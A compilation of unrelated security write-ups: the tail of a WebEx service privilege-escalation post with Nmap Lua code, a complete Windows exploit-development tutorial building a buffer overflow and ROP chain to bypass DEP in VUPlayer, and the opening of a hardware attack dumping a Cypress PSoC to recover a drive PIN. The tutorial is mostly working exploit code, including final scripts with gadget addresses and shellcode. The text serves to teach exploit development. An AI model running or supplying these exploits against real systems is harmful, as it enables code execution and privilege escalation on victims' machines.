local webexec_command = "sc create " .. test_service .. " binpath= c:\\fakepath.exe"
status, result = msrpc.svcctl_startservicew(smbstate, open_service_result['handle'], stdnse.strsplit(" ", "install software-update 1 " .. webexec_command))

-- ...

local test_status, test_result = msrpc.svcctl_openservicew(smbstate, open_result['handle'], test_service, 0x00000)

-- If the service DOES_NOT_EXIST, we couldn't run code
if string.match(test_result, 'DOES_NOT_EXIST') then
  stdnse.debug("Result: Test service does not exist: probably not vulnerable")
  msrpc.svcctl_closeservicehandle(smbstate, open_result['handle'])

  vuln.check_results = "Could not execute code via WebExService"
  return report:make_output(vuln)
end

Not shown: we also delete the service once we’re finished.

Conclusion

So there you have it! Escalating privileges from zero to SYSTEM using WebEx’s built-in update service! Local and remote! Check out webexec.org for tools and usage instructions!

Zero Day Zen Garden: Windows Exploit Development — Part 5 [Return Oriented Programming Chains]

( orig text )

Hello again! Welcome to another post on Windows exploit development. Today we’re going to be discussing a technique called Return Oriented Programming (ROP) that’s commonly used to get around a type of exploit mitigation called Data Execution Prevention (DEP). This technique is slightly more advanced than previous exploitation methods, but it’s well worth learning because DEP is a protective mechanism that is now employed on a majority of modern operating systems. So without further ado, it’s time to up your exploit development game and learn how to commit a roppery!

Setting up a Windows 7 Development Environment

So far we’ve been doing our exploitation on Windows XP as a way to learn how to create exploits in an OS that has fewer security mechanisms to contend with. It’s important to start simple when you’re learning something new! But, it’s now time to take off the training wheels and move on to a more modern OS with additional exploit mitigations. For this tutorial, we’ll be using a Windows 7 virtual machine environment. Thankfully, Microsoft provides Windows 7 VMs for demoing their Internet Explorer browser. They will work nicely for our purposes here today so go ahead and download the VM from here.

Next, load it into VirtualBox and start it up. Install Immunity Debugger, Python and mona.py again as instructed in the previous blog post here. When that’s ready, you’re all set to start learning ROP with our target software VUPlayer which you can get from the Exploit-DB entry we’re working off here.

Finally, make sure DEP is turned on for your Windows 7 virtual machine by going to Control Panel > System and Security > System then clicking on Advanced system settings, click on Settings… and go to the Data Execution Prevention tab to select ‘Turn on DEP for all programs and services except those I select:’ and restart your VM to ensure DEP is turned on.

post_image

With that, you should be good to follow along with the rest of the tutorial.

Data Execution Prevention and You!

Let’s start things off by confirming that a vulnerability exists and write a script to cause a buffer overflow:

vuplayer_rop_poc1.py

buf = "A"*3000
 
print "[+] Creating .m3u file of size "+ str(len(buf))
 
file = open('vuplayer-dep.m3u','w');
file.write(buf);
file.close();
 
print "[+] Done creating the file"

Attach Immunity Debugger to VUPlayer and run the script, drag and drop the output file ‘vuplayer-dep.m3u’ into the VUPlayer dialog and you’ll notice that our A character string overflows a buffer to overwrite EIP.

post_image

Great! Next, let’s find the offset by writing a script with a pattern buffer string. Generate the buffer with the following mona command:

!mona pc 3000

Then copy paste it into an updated script:

vuplayer_rop_poc2.py

buf = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9"
 
print "[+] Creating .m3u file of size "+ str(len(buf))
 
file = open('vuplayer-dep.m3u','w');
file.write(buf);
file.close();
 
print "[+] Done creating the file"

Restart VUPlayer in Immunity and run the script, drag and drop the file then run the following mona command to find the offset:

!mona po 0x68423768

post_image

post_image

Got it! The offset is at 1012 bytes into our buffer and we can now update our script to add in an address of our choosing. Let’s find a jmp esp instruction we can use with the following mona command:

!mona jmp -r esp

Ah, I see a good candidate at address 0x1010539f in the output files from Mona:

post_image

Let’s plug that in and insert a mock shellcode payload of INT instructions:

vuplayer_rop_poc3.py

import struct
 
BUF_SIZE = 3000
 
junk = "A"*1012
eip = struct.pack('<L', 0x1010539f)
 
shellcode = "\xCC"*200
 
exploit = junk + eip + shellcode
 
fill = "\x43" * (BUF_SIZE - len(exploit))
 
buf = exploit + fill
 
print "[+] Creating .m3u file of size "+ str(len(buf))
 
file = open('vuplayer-dep.m3u','w');
file.write(buf);
file.close();

print "[+] Done creating the file"

Time to restart VUPlayer in Immunity again and run the script. Drag and drop the file and…

post_image

Nothing happened? Huh? How come our shellcode payload didn’t execute? Well, that’s where Data Execution Prevention is foiling our evil plans! The OS is not allowing us to interpret the “0xCC” INT instructions as planned, instead it’s just failing to execute the data we provided it. This causes the program to simply crash instead of run the shellcode we want. But, there is a glimmer of hope! See, we were able to execute the “JMP ESP” instruction just fine right? So, there is SOME data we can execute, it must be existing data instead of arbitrary data like have used in the past. This is where we get creative and build a program using a chain of assembly instructions just like the “JMP ESP” we were able to run before that exist in code sections that are allowed to be executed. Time to learn about ROP!

Problems, Problems, Problems

Let’s start off by thinking about what the core of our problem here is. DEP is preventing the OS from interpreting our shellcode data “\xCC” as an INT instruction, instead it’s throwing up its hands and saying “I have no idea what in fresh hell this 0xCC stuff is! I’m just going to fail…” whereas without DEP it would say “Ah! Look at this, I interpret 0xCC to be an INT instruction, I’ll just go ahead and execute this instruction for you!”. With DEP enabled, certain sections of memory (like the stack where our INT shellcode resides) are marked as NON-EXECUTABLE (NX), meaning data there cannot be interpreted by the OS as an instruction. But, nothing about DEP says we can’t execute existing program instructions that are marked as executable like for example, the code making up the VUPlayer program! This is demonstrated by the fact that we could execute the JMP ESP code, because that instruction was found in the program itself and was therefore marked as executable so the program can run. However, the 0xCC shellcode we stuffed in is new, we placed it there in a place that was marked as non-executable.

ROP to the Rescue

So, we now arrive at the core of the Return Oriented Programming technique. What if, we could collect a bunch of existing program assembly instructions that aren’t marked as non-executable by DEP and chain them together to tell the OS to make our shellcode area executable? If we did that, then there would be no problem right? DEP would still be enabled but, if the area hosting our shellcode has been given a pass by being marked as executable, then it won’t have a problem interpreting our 0xCC data as INT instructions.

ROP does exactly that, those nuggets of existing assembly instructions are known as “gadgets” and those gadgets typically have the form of a bunch of addresses that point to useful assembly instructions followed by a “return” or “RET” instruction to start executing the next gadget in the chain. That’s why it’s called Return Oriented Programming!

But, what assembly program can we build with our gadgets so we can mark our shellcode area as executable? Well, there’s a variety to choose from on Windows but the one we will be using today is called VirtualProtect(). If you’d like to read about the VirtualProtect() function, I encourage you to check out the Microsoft developer page about it here). But, basically it will mark a memory page of our choosing as executable. Our challenge now, is to build that function in assembly using ROP gadgets found in the VUPlayer program.

Building a ROP Chain

So first, let’s establish what we need to put into what registers to get VirtualProtect() to complete successfully. We need to have:

  1. lpAddress: A pointer to an address that describes the starting page of the region of pages whose access protection attributes are to be changed.
  2. dwSize: The size of the region whose access protection attributes are to be changed, in bytes.
  3. flNewProtect: The memory protection option. This parameter can be one of the memory protection constants.
  4. lpflOldProtect: A pointer to a variable that receives the previous access protection value of the first page in the specified region of pages. If this parameter is NULL or does not point to a valid variable, the function fails.

Okay! Our tasks are laid out before us, time to create a program that will fulfill all these requirements. We will set lpAddress to the address of our shellcode, dwSize to be 0x201 so we have a sizable chunk of memory to play with, flNewProtect to be 0x40 which will mark the new page as executable through a memory protection constant (complete list can be found here), and finally we’ll set lpflOldProtect to be any static writable location. Then, all that is left to do is call the VirtualProtect() function we just set up and watch the magic happen!

First, let’s find ROP gadgets to build up the arguments our VirtualProtect() function needs. This will become our toolbox for building a ROP chain, we can grab gadgets from executable modules belonging to VUPlayer by checking out the list here:

post_image

To generate a list of usable gadgets from our chosen modules, you can use the following command in Mona:

!mona rop -m “bass,basswma,bassmidi”

post_image

Check out the rop_suggestions.txt file Mona generated and let’s get to building our ROP chain.

post_image

First let’s place a value into EBP for a call to PUSHAD at the end:

0x10010157,  # POP EBP # RETN [BASS.dll]
0x10010157,  # skip 4 bytes [BASS.dll]

Here, put the dwSize 0x201 by performing a negate instruction and place the value into EAX then move the result into EBX with the following instructions:

0x10015f77,  # POP EAX # RETN [BASS.dll] 
0xfffffdff,  # Value to negate, will become 0x00000201
0x10014db4,  # NEG EAX # RETN [BASS.dll] 
0x10032f72,  # XCHG EAX,EBX # RETN 0x00 [BASS.dll]

Then, we’ll put the flNewProtect 0x40 into EAX then move the result into EDX with the following instructions:

0x10015f82,  # POP EAX # RETN [BASS.dll] 
0xffffffc0,  # Value to negate, will become 0x00000040
0x10014db4,  # NEG EAX # RETN [BASS.dll] 
0x10038a6d,  # XCHG EAX,EDX # RETN [BASS.dll]

Next, let’s place our writable location (any valid writable location will do) into ECX for lpflOldProtect.

0x101049ec,  # POP ECX # RETN [BASSWMA.dll] 
0x101082db,  # &Writable location [BASSWMA.dll]

Then, we get some values into the EDI and ESI registers for a PUSHAD call later:

0x1001621c,  # POP EDI # RETN [BASS.dll] 
0x1001dc05,  # RETN (ROP NOP) [BASS.dll]
0x10604154,  # POP ESI # RETN [BASSMIDI.dll] 
0x10101c02,  # JMP [EAX] [BASSWMA.dll]

Finally, we set up the call to the VirtualProtect() function by placing the address of VirtualProtect (0x1060e25c) in EAX:

0x10015fe7,  # POP EAX # RETN [BASS.dll] 
0x1060e25c,  # ptr to &VirtualProtect() [IAT BASSMIDI.dll]

Then, all that’s left to do is push the registers with our VirtualProtect() argument values to the stack with a handy PUSHAD then pivot to the stack with a JMP ESP:

0x1001d7a5,  # PUSHAD # RETN [BASS.dll] 
0x10022aa7,  # ptr to 'jmp esp' [BASS.dll]

PUSHAD will place the register values on the stack in the following order: EAX, ECX, EDX, EBX, original ESP, EBP, ESI, and EDI. If you’ll recall, this means that the stack will look something like this with the ROP gadgets we used to setup the appropriate registers:

| EDI (0x1001dc05) |
| ESI (0x10101c02) |
| EBP (0x10010157) |
================
VirtualProtect() Function Call args on stack
| ESP (0x0012ecf0) | ← lpAddress [JMP ESP + NOPS + shellcode]
| 0x201 | ← dwSize
| 0x40 | ← flNewProtect
| &WritableLocation (0x101082db) | ← lpflOldProtect
| &VirtualProtect (0x1060e25c) | ← VirtualProtect() call
================

Now our stack will be setup to correctly call the VirtualProtect() function! The top param hosts our shellcode location which we want to make executable, we are giving it the ESP register value pointing to the stack where our shellcode resides. After that it’s the dwSize of 0x201 bytes. Then, we have the memory protection value of 0x40 for flNewProtect. Then, it’s the valid writable location of 0x101082db for lpflOldProtect. Finally, we have the address for our VirtualProtect() function call at 0x1060e25c.

With the JMP ESP instruction, EIP will point to the VirtualProtect() call and we will have succeeded in making our shellcode payload executable. Then, it will slide down a NOP sled into our shellcode which will now work beautifully!

Updating Exploit Script with ROP Chain

It’s time now to update our Python exploit script with the ROP chain we just discussed, you can see the script here:

vuplayer_rop_poc4.py


import struct
 
BUF_SIZE = 3000
 
def create_rop_chain():

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
      0x10010157,  # POP EBP # RETN [BASS.dll]
      0x10010157,  # skip 4 bytes [BASS.dll]
      0x10015f77,  # POP EAX # RETN [BASS.dll]
      0xfffffdff,  # Value to negate, will become 0x00000201
      0x10014db4,  # NEG EAX # RETN [BASS.dll]
      0x10032f72,  # XCHG EAX,EBX # RETN 0x00 [BASS.dll]
      0x10015f82,  # POP EAX # RETN [BASS.dll]
      0xffffffc0,  # Value to negate, will become 0x00000040
      0x10014db4,  # NEG EAX # RETN [BASS.dll]
      0x10038a6d,  # XCHG EAX,EDX # RETN [BASS.dll]
      0x101049ec,  # POP ECX # RETN [BASSWMA.dll]
      0x101082db,  # &Writable location [BASSWMA.dll]
      0x1001621c,  # POP EDI # RETN [BASS.dll]
      0x1001dc05,  # RETN (ROP NOP) [BASS.dll]
      0x10604154,  # POP ESI # RETN [BASSMIDI.dll]
      0x10101c02,  # JMP [EAX] [BASSWMA.dll]
      0x10015fe7,  # POP EAX # RETN [BASS.dll]
      0x1060e25c,  # ptr to &VirtualProtect() [IAT BASSMIDI.dll]
      0x1001d7a5,  # PUSHAD # RETN [BASS.dll]
      0x10022aa7,  # ptr to 'jmp esp' [BASS.dll]
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
 
junk = "A"*1012
 
rop_chain = create_rop_chain()
 
eip = struct.pack('<L',0x10601033) # RETN (BASSMIDI.dll)
 
nops = "\x90"*16
 
shellcode = "\xCC"*200
 
exploit = junk + eip + rop_chain + nops + shellcode
 
fill = "\x43" * (BUF_SIZE - len(exploit))
 
buf = exploit + fill
 
print "[+] Creating .m3u file of size "+ str(len(buf))
 
file = open('vuplayer-dep.m3u','w');
file.write(buf);
file.close();
 
print "[+] Done creating the file"

We added the ROP chain in a function called create_rop_chain() and we have our mock shellcode to verify if the ROP chain did its job. Go ahead and run the script then restart VUPlayer in Immunity Debug. Drag and drop the file to see a glorious INT3 instruction get executed!

post_image

You can also inspect the process memory to see the ROP chain layout:

post_image

Now, sub in an actual payload, I’ll be using a vanilla calc.exe payload. You can view the updated script below:

vuplayer_rop_poc5.py

import struct
 
BUF_SIZE = 3000
 
def create_rop_chain():
 
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
      0x10010157,  # POP EBP # RETN [BASS.dll]
      0x10010157,  # skip 4 bytes [BASS.dll]
      0x10015f77,  # POP EAX # RETN [BASS.dll]
      0xfffffdff,  # Value to negate, will become 0x00000201
      0x10014db4,  # NEG EAX # RETN [BASS.dll]
      0x10032f72,  # XCHG EAX,EBX # RETN 0x00 [BASS.dll]
      0x10015f82,  # POP EAX # RETN [BASS.dll]
      0xffffffc0,  # Value to negate, will become 0x00000040
      0x10014db4,  # NEG EAX # RETN [BASS.dll]
      0x10038a6d,  # XCHG EAX,EDX # RETN [BASS.dll]
      0x101049ec,  # POP ECX # RETN [BASSWMA.dll]
      0x101082db,  # &Writable location [BASSWMA.dll]
      0x1001621c,  # POP EDI # RETN [BASS.dll]
      0x1001dc05,  # RETN (ROP NOP) [BASS.dll]
      0x10604154,  # POP ESI # RETN [BASSMIDI.dll]
      0x10101c02,  # JMP [EAX] [BASSWMA.dll]
      0x10015fe7,  # POP EAX # RETN [BASS.dll]
      0x1060e25c,  # ptr to &VirtualProtect() [IAT BASSMIDI.dll]
      0x1001d7a5,  # PUSHAD # RETN [BASS.dll]
      0x10022aa7,  # ptr to 'jmp esp' [BASS.dll]
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
 
junk = "A"*1012
 
rop_chain = create_rop_chain()
 
eip = struct.pack('<L',0x10601033) # RETN (BASSMIDI.dll)
 
nops = "\x90"*16
 
shellcode = ("\xbb\xc7\x16\xe0\xde\xda\xcc\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
"\x33\x83\xc0\x04\x31\x58\x0e\x03\x9f\x18\x02\x2b\xe3\xcd\x4b"
"\xd4\x1b\x0e\x2c\x5c\xfe\x3f\x7e\x3a\x8b\x12\x4e\x48\xd9\x9e"
"\x25\x1c\xc9\x15\x4b\x89\xfe\x9e\xe6\xef\x31\x1e\xc7\x2f\x9d"
"\xdc\x49\xcc\xdf\x30\xaa\xed\x10\x45\xab\x2a\x4c\xa6\xf9\xe3"
"\x1b\x15\xee\x80\x59\xa6\x0f\x47\xd6\x96\x77\xe2\x28\x62\xc2"
"\xed\x78\xdb\x59\xa5\x60\x57\x05\x16\x91\xb4\x55\x6a\xd8\xb1"
"\xae\x18\xdb\x13\xff\xe1\xea\x5b\xac\xdf\xc3\x51\xac\x18\xe3"
"\x89\xdb\x52\x10\x37\xdc\xa0\x6b\xe3\x69\x35\xcb\x60\xc9\x9d"
"\xea\xa5\x8c\x56\xe0\x02\xda\x31\xe4\x95\x0f\x4a\x10\x1d\xae"
"\x9d\x91\x65\x95\x39\xfa\x3e\xb4\x18\xa6\x91\xc9\x7b\x0e\x4d"
"\x6c\xf7\xbc\x9a\x16\x5a\xaa\x5d\x9a\xe0\x93\x5e\xa4\xea\xb3"
"\x36\x95\x61\x5c\x40\x2a\xa0\x19\xbe\x60\xe9\x0b\x57\x2d\x7b"
"\x0e\x3a\xce\x51\x4c\x43\x4d\x50\x2c\xb0\x4d\x11\x29\xfc\xc9"
"\xc9\x43\x6d\xbc\xed\xf0\x8e\x95\x8d\x97\x1c\x75\x7c\x32\xa5"
"\x1c\x80")
 
exploit = junk + eip + rop_chain + nops + shellcode
 
fill = "\x43" * (BUF_SIZE - len(exploit))
 
buf = exploit + fill
 
print "[+] Creating .m3u file of size "+ str(len(buf))
 
file = open('vuplayer-dep.m3u','w');
file.write(buf);
file.close();
 
print "[+] Done creating the file"

Run the final exploit script to generate the m3u file, restart VUPlayer in Immunity Debug and voila! We have a calc.exe!

post_image

Also, if you are lucky then Mona will auto-generate a complete ROP chain for you in the rop_chains.txt file from the !mona rop command (which is what I used). But, it’s important to understand how these chains are built line by line before you go automating everything!

post_image

Resources, Final Thoughts and Feedback

Congrats on building your first ROP chain! It’s pretty tricky to get your head around at first, but all it takes is a little time to digest, some solid assembly programming knowledge and a bit of familiarity with the Windows OS. When you get the essentials under your belt, these more advanced exploit techniques become easier to handle. If you found anything to be unclear or you have some recommendations then send me a message on Twitter (@shogun_lab). I also encourage you to take a look at some additional tutorials on ROP and the developer docs for the various Windows OS memory protection functions. See you next time in Part 6!

Aigo Chinese encrypted HDD − Part 2: Dumping the Cypress PSoC 1

Original post by Raphaël Rigo on syscall.eu ( under CC-BY-SA 4.0 )

TL;DR

I dumped a Cypress PSoC 1 (CY8C21434) flash memory, bypassing the protection, by doing a cold-boot stepping attack, after reversing the undocumented details of the in-system serial programming protocol (ISSP).

It allows me to dump the PIN of the hard-drive from part 1 directly:

$ ./psoc.py 
syncing:  KO  OK
[...]
PIN:  1 2 3 4 5 6 7 8 9  

Code:

Introduction

So, as we have seen in part 1, the Cypress PSoC 1 CY8C21434 microcontroller seems like a good target, as it may contain the PIN itself. And anyway, I could not find any public attack code, so I wanted to take a look at it.

Our goal is to read its internal flash memory and so, the steps we have to cover here are to:

  • manage to “talk” to the microcontroller
  • find a way to check if it is protected against external reads (most probably)
  • find a way to bypass the protection

There are 2 places where we can look for the valid PIN:

  • the internal flash memory
  • the SRAM, where it may be stored to compare it to the PIN entered by the user

ISSP Protocol

ISSP ??

“Talking” to a micro-controller can imply different things from vendor to vendor but most of them implement a way to interact using a serial protocol (ICSP for Microchip’s PIC for example).

Cypress’ own proprietary protocol is called ISSP for “in-system serial programming protocol”, and is (partially) described in its documentationUS Patent US7185162 also gives some information.

There is also an open source implemention called HSSP, which we will use later.

ISSP basically works like this:

  • reset the µC
  • output a magic number to the serial data pin of the µC to enter external programming mode
  • send commands, which are actually long strings of bits called “vectors”

The ISSP documentation only defines a handful of such vectors:

  • Initialize-1
  • Initialize-2
  • Initialize-3 (3V and 5V variants)
  • ID-SETUP
  • READ-ID-WORD
  • SET-BLOCK-NUM: 10011111010dddddddd111 where dddddddd=block #
  • BULK ERASE
  • PROGRAM-BLOCK
  • VERIFY-SETUP
  • READ-BYTE: 10110aaaaaaZDDDDDDDDZ1 where DDDDDDDD = data out, aaaaaa = address (6 bits)
  • WRITE-BYTE: 10010aaaaaadddddddd111 where dddddddd = data in, aaaaaa = address (6 bits)
  • SECURE
  • CHECKSUM-SETUP
  • READ-CHECKSUM: 10111111001ZDDDDDDDDZ110111111000ZDDDDDDDDZ1 where DDDDDDDDDDDDDDDD = Device Checksum data out
  • ERASE BLOCK

For example, the vector for Initialize-2 is:

1101111011100000000111 1101111011000000000111
1001111100000111010111 1001111100100000011111
1101111010100000000111 1101111010000000011111
1001111101110000000111 1101111100100110000111
1101111101001000000111 1001111101000000001111
1101111000000000110111 1101111100000000000111
1101111111100010010111

Each vector is 22 bits long and seem to follow some pattern. Thankfully, the HSSP doc gives us a big hint: “ISSP vector is nothing but a sequence of bits representing a set of instructions.”

Demystifying the vectors

Now, of course, we want to understand what’s going on here. At first, I thought the vectors could be raw M8C instructions, but the opcodes did not match.

Then I just googled the first vector and found this research by Ahmed Ismail which, while it does not go into much details, gives a few hints to get started: “Each instruction starts with 3 bits that select 1 out of 4 mnemonics (read RAM location, write RAM location, read register, or write register.) This is followed by the 8-bit address, then the 8-bit data read or written, and finally 3 stop bits.”

Then, reading the Techical reference manual’s section on the Supervisory ROM (SROM) is very useful. The SROM is hardcoded (ROM) in the PSoC and provides functions (like syscalls) for code running in “userland”:

  • 00h : SWBootReset
  • 01h : ReadBlock
  • 02h : WriteBlock
  • 03h : EraseBlock
  • 06h : TableRead
  • 07h : CheckSum
  • 08h : Calibrate0
  • 09h : Calibrate1

By comparing the vector names with the SROM functions, we can match the various operations supported by the protocol with the expected SROM parameters.

This gives us a decoding of the first 3 bits :

  • 100 => “wrmem”
  • 101 => “rdmem”
  • 110 => “wrreg”
  • 111 => “rdreg”

But to fully understand what is going on, it is better to be able to interact with the µC.

Talking to the PSoC

As Dirk Petrautzki already ported Cypress’ HSSP code on Arduino, I used an Arduino Uno to connect to the ISSP header of the keyboard PCB.

Note that over the course of my research, I modified Dirk’s code quite a lot, you can find my fork on GitHub: here, and the corresponding Python script to interact with the Arduino in my cypress_psoc_tools repository.

So, using the Arduino, I first used only the “official” vectors to interact, and in order to try to read the internal ROM using the VERIFY command. Which failed, as expected, most probably because of the flash protection bits.

I then built my own simple vectors to read/write memory/registers.

Note that we can read the whole SRAM, even though the flash is protected !

Identifying internal registers

After looking at the vector’s “disassembly”, I realized that some undocumented registers (0xF8-0xFA) were used to specify M8C opcodes to execute directly !

This allowed me to run various opcodes such as ADDMOV A,XPUSH or JMP, which, by looking at the side effects on all the registers, allowed me to identify which undocumented registers actually are the “usual” ones (AXSP and PC).

In the end, the vector’s “dissassembly” generated by HSSP_disas.rb looks like this, with comments added for clarity:

--== init2 ==--
[DE E0 1C] wrreg CPU_F (f7), 0x00      # reset flags
[DE C0 1C] wrreg SP (f6), 0x00         # reset SP
[9F 07 5C] wrmem KEY1, 0x3A            # Mandatory arg for SSC
[9F 20 7C] wrmem KEY2, 0x03            # same
[DE A0 1C] wrreg PCh (f5), 0x00        # reset PC (MSB) ...
[DE 80 7C] wrreg PCl (f4), 0x03        # (LSB) ... to 3 ??
[9F 70 1C] wrmem POINTER, 0x80         # RAM pointer for output data
[DF 26 1C] wrreg opc1 (f9), 0x30       # Opcode 1 => "HALT"
[DF 48 1C] wrreg opc2 (fa), 0x40       # Opcode 2 => "NOP"
[9F 40 3C] wrmem BLOCKID, 0x01         # BLOCK ID for SSC call
[DE 00 DC] wrreg A (f0), 0x06          # "Syscall" number : TableRead
[DF 00 1C] wrreg opc0 (f8), 0x00       # Opcode for SSC, "Supervisory SROM Call"
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12   # Undocumented op: execute external opcodes

Security bits

At this point, I am able to interact with the PSoC, but I need reliable information about the protection bits of the flash. I was really surprised that Cypress did not give any mean to the users to check the protection’s status. So, I dug a bit more on Google to finally realize that the HSSP code provided by Cypress was updated after Dirk’s fork.

